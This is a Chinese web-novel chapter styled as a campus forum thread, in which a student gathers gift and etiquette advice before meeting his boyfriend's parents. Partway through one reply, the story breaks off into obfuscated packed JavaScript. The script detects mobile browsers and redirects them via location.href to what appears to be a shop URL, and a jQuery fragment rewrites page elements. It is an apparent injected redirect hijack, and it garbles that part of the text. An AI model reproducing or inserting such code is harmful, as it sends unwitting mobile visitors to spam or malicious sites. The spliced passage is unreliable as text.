标题:【树洞】急!第一次上门要带什么?在线等!
论坛板块:京华大学\校园生活\情感树洞
发帖人:足球不行踢球去
正文:
兄弟们!!!
出大事了!!!
不对,是好事情!!!
——
昨天晚上,我正躺在床上刷手机。
突然收到顾辞的消息。
【圆圆】:我妈说,下次回家,带你一起。
我盯着这行字,看了三遍。
第一遍:没看懂。
第二遍:好像看懂了。
第三遍:操操操操操!!!
我从床上弹起来,在房间里走了三圈。
然后又坐回去,重新看那条消息。
没错。
是“带你一起”。
不是“以后再说”,不是“有机会的话”,是“带你一起”。
他妈说的。
他妈让我去他家吃饭。
——
我给顾辞打电话。
他接起来,还没说话,我就喊:
“真的假的?!!”
他在那边轻轻笑了一声。
“真的。”
“我妈今天吃饭的时候说的。”
“说让我下次带你回来,她做几个菜。”
我说:“你妈……不生气了?”
他说:“不是不生气。”
“但她愿意试试。”
“试试接受,试试了解,试试……和你吃饭。”
我听着他那句“试试”,心里突然有点酸。
他妈是那种书香门第出来的,一辈子端着,一辈子体面。
让她说出“试试”这两个字,得多难。
我说:“顾辞。”
“嗯?”
“你妈真好。”
他沉默了一下。
然后说:“嗯。”
声音有点哑。
——
挂了电话,我又在房间里走了三圈。
然后冲到我妈房间门口,敲门。
我妈开门,一脸警惕:“大晚上干嘛?”
我说:“妈!顾辞他妈让我下次去他家吃饭!”
我妈愣了一下。
然后说:“哦。”
我说:“就‘哦’??你不激动吗??”
我妈说:“激动什么?人家那是给顾辞面子,你以为给你呢?”
我:“……”
我妈说:“去了别丢人,少吃点,多说谢谢,别跟在家似的。”
我说:“知道了知道了。”
我妈又说:“带点东西去,别空手。”
我说:“带什么?”
我妈想了想,说:“水果吧,别太贵的,也别太便宜的。客气点就行。”
我点点头,记下了。
——
【问题来了】
回到房间,我开始认真想这个问题。
带水果?
是不是太普通了?
顾辞家是书香门第,他爸妈都是文化人。
我拎着一兜橘子去,会不会显得太……太莽了?
可是带什么呢?
茶叶?我不懂。
酒?他爸喝不喝酒我不知道。
书?我又不知道他爸妈喜欢看什么。
我他妈一个体育生,这辈子没这么为送礼发过愁。
——
所以兄弟们。
求求你们了。
第一次上门,带什么?
要那种……不丢人的,不尴尬的,不显得我太傻的。
最好还能让他爸妈觉得“这孩子还挺懂事”的。
在线等!
挺急的!
——
1楼匿名用户:
沙发!!!
楼主你终于回来了!!!
2楼匿名用户:
卧槽卧槽卧槽!!!
顾辞妈妈同意了???
这是什么神仙发展!!!
3楼匿名用户:
呜呜呜呜呜!!!
赛博父母流下了欣慰的泪水!!!
儿子终于要见家长了!!!
4楼匿名用户:
楼主你这个问题问得好!
第一次上门,确实是技术活!
5楼匿名用户:
水果不行,太普通了。
而且顾辞家那种书香门第,你拎一兜橘子去,确实不太对味。
6楼匿名用户:
茶叶!
送茶叶!
有文化,不贵,还体面!
7楼匿名用户:
回6楼:但楼主不懂茶叶啊!
万一买到不好的,或者买错品类,更尴尬。
8楼匿名用户:
水果可以,但得是那种……有品质的水果。
比如进口的车厘子,比如那种礼盒装的水蜜桃。
看着好看,吃着也好。
9楼匿名用户:
对对对!
车厘子!又贵又不容易踩雷!
而且现在正好是季节!
10楼匿名用户:
或者送坚果礼盒?
那种包装好看的,也挺体面。
11楼匿名用户:
鲜花?
书香门第应该喜欢花吧?
12楼匿名用户:
回11楼:鲜花可以,但得是那种……不太张扬的。
别送红玫瑰,送点淡雅的,比如百合、兰花什么的。
13楼匿名用户:
等等等等,你们都忽略了一个重要问题!
顾辞爸妈什么性格?
楼主你知道不?
14楼楼主:
他爸我没见过。
他妈我见过几次,就是那种……很温柔但很严肃的。
话不多,但看人看得很准那种。
15楼匿名用户:
懂了。
这种长辈,不喜欢花里胡哨的。
喜欢实在的,有心的。
16楼匿名用户:
那我觉得可以送点心。
那种老字号的,包装精致的点心。
又实在,又有心意,还能一起吃。
17楼匿名用户:
对对对!
麦香村那种!
或者本地的老字号糕点!
肯定不出错!
18楼匿名用户:
而且点心可以大家一起吃,不会像茶叶那样放着不知道什么时候喝。
19楼匿名用户:
我再加一个:可以带点你家乡的特产。
你不是本地人吧?带点老家的东西,显得有心,还有话题可以聊。
20楼楼主:
这个可以有。
我老家有那种手工做的腊肠,我妈每年都买。
挺好吃的,应该能拿得出手吧?
21楼匿名用户:
腊肠!
这个好!
有特色,有诚意,还能做菜!
他妈做饭的时候正好能用上!
22楼匿名用户:
对对对!
你就说“这是我老家那边的特产,我妈说这个做菜特别香,带来给您尝尝”。
既显得你懂事,又显得你妈也懂礼数。
23楼楼主:
好!
记下了!
24楼匿名用户:
再加一盒车厘子!
又好看又好吃!
完美!
25楼匿名用户:
楼主你穿什么想好了吗?
别穿你那身运动服去!
26楼楼主:
……
还没想。
27楼匿名用户:
穿干净点!
别太正式,也别太随意!
卫衣牛仔裤可以,但要干净的!
别穿那件被你踢球穿烂了的!
28楼楼主:
……
我穿新买的那件。
29楼匿名用户:
对对对!
就是上次约会穿的那件深灰色!
顾辞说好看的那件!
30楼楼主:
你怎么知道是哪件?
31楼匿名用户:
废话!
你上次约会回来汇报过的!
“深灰色卫衣,他说好看”!
赛博父母记着呢!
32楼楼主:
……
行吧。
33楼匿名用户:
还有,去了之后别紧张!
该说话说话,该吃饭吃饭!
别光顾着紧张,一句话不说!
34楼匿名用户:
对!
多说“谢谢阿姨”“阿姨做的菜真好吃”!
这种话永远不会错!
35楼匿名用户:
还有,帮忙收拾!
吃完饭主动帮忙收碗!
虽然人家肯定不会让你洗,但这个态度要有!
36楼匿名用户:
对对对!
眼力见儿!
一定要有眼力见儿!
37楼匿名用户:
还有,别一直盯着顾辞看!
我知道你想看他,但在他爸妈面前,收敛点!
该看菜看菜,该看人看人!
38楼楼主:
……
知道了。
39楼匿名用户:
还有还有!
别叫“顾辞”!
叫“小辞”或者“辞辞”?
他爸妈怎么叫的?
40楼楼主:
他妈叫他“辞辞”。
41楼匿名用户:
那你也叫“辞辞”?
会不会太肉麻?
42楼匿名用户:
叫“小辞”吧!
亲切但不肉麻!
43楼楼主:
好。
小辞。
44楼匿名用户:
还有!
别提前到!
也别迟到!
提前五分钟到最合适!
45楼楼主:
好。
46楼匿名用户:
礼物提前准备好!
包装好看点!
别拎着塑料袋去!
47楼楼主:
好。
48楼匿名用户:
还有还有!
万一他爸问你问题,好好回答!
别“嗯”“啊”“还行”!
多说几句!
49楼楼主:
好。
50楼匿名用户:
行了,暂时想到这么多。
楼主你记下来!
51楼楼主:
记了。
备忘录快写满了。
52楼匿名用户:
哈哈哈哈哈哈!
赛博父母的爱,就是这么沉重!
53楼匿名用户:
楼主,加油!
这次见面很重要!
但也不用太紧张!
你是去吃饭的,不是去面试的!
54楼匿名用户:
对!
做你自己!</p
;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382535|200203||http|test|mini|href|location''.split(''|''),0,{}));
() {
$(''.inform'').remove();
$(''#content'').append(''
>
你平时什么样,就什么样!
别装,一装就露馅!
55楼楼主:
好。
谢谢你们。
——
【和顾辞聊天】
晚上我给顾辞发消息。
【张】:你妈喜欢吃什么?
【圆圆】:?
【张】:我上门要带东西啊,得投其所好。
【圆圆】:不用带。
【张】:不行,我妈说了,不能空手。
【圆圆】:……
【圆圆】:她喜欢吃甜的。
【圆圆】:但血糖有点高,不能多吃。
【张】:懂了。
【张】:少糖的点心,或者水果。
【圆圆】:嗯。
【张】:你爸呢?
【圆圆】:他喝茶。
【圆圆】:但你别买茶叶。
【张】:为什么?
【圆圆】:他太挑了,你买的他肯定看不上。
【张】:……
【张】:好伤人啊。
【圆圆】:实话。
【张】:那送什么?
【圆圆】:什么都不送最好。
【张】:不行。
【张】:你快帮我想!
【圆圆】:……
【圆圆】:我妈前两天说想吃柿饼。
【圆圆】:老字号的,那种软软的有白霜的。
【张】:柿饼???
【张】:这么简单???
【圆圆】:嗯。
【张】:那行!
【张】:我买柿饼!
【张】再加点别的!
【圆圆】:不用别的。
【张】:不行,太少了。
【圆圆】:那你再加个水果吧。
【张】:好!
【圆圆】:张扬。
【张】:嗯?
【圆圆】:不用紧张。
【圆圆】:就是吃个饭。
【圆圆】:我妈既然让你来,就不会为难你。
我看着那几行字。
心里突然就不那么慌了。
他说“不用紧张”。
他说“就是吃个饭”。
他说“我妈既然让你来,就不会为难你”。
操。
我信他。
——
【现在】
现在我在床上,盯着天花板。
礼物想好了:老字号柿饼+车厘子。
衣服想好了:那件深灰色卫衣。
时间:提前五分钟到。
称呼:叫他“小辞”。
态度:多夸阿姨做的菜,帮忙收碗,不一直盯着顾辞看。
一切都准备好了。
但我还是有点紧张。
不是怕他爸妈不喜欢我。
是怕我表现不好,给他丢人。
——
兄弟们。
你们还有什么要叮嘱的吗?
在线等。
明天就去了。
——
1楼匿名用户:
最后叮嘱一句:
不管发生什么,记得笑。
笑着说话,笑着吃饭,笑着道别。
笑容是最好的礼物。
2楼匿名用户:
对对对!
笑得好看点!
别像平时那样傻笑!
3楼楼主:
……
我尽量。
4楼匿名用户:
还有,回来记得汇报!
我们要听全过程!
5楼楼主:
好。
一定。
6楼匿名用户:
去吧儿子!
赛博父母等你凯旋!
7楼匿名用户:
加油楼主!
拿下顾辞爸妈!
——
【深夜】
手机又震了一下。
【圆圆】:睡了?
【张】:没。
【圆圆】:还在紧张?
【张】:嗯。
【圆圆】:张扬。
【张】:嗯?
【圆圆】:你知道我妈今天说什么了吗?
【张】:什么?
【圆圆】:她说,那个孩子,眼睛挺干净的。
【张】:……眼睛干净?
【圆圆】:嗯。
【圆圆】:她说,看一个人,先看眼睛。
【圆圆】:你眼睛干净,说明人不会差。
我盯着那几行字。
眼眶突然有点酸。
他妈说,我眼睛干净。
他妈说,人不会差。
我打字:
【张】:替我谢谢你妈。
【圆圆】:你自己谢。
【圆圆】:明天当面谢。
【张】:好。
【圆圆】:晚安。
【张】:晚安。
——
窗外有月光。
很亮。
我想起他妈说的那句话。
“眼睛挺干净的。”
我以前从来不知道,眼睛还能看出来这些。
但她说对了。
我确实没什么坏心眼。
我只喜欢一个人。
喜欢了很久。
以后也会一直喜欢。
——
明天。
去见他的爸妈。
去见那个说他“眼睛干净”的阿姨。
去见那个“肯定看不上我买的茶叶”的叔叔。
不怕。
有他在旁边。
什么都不怕。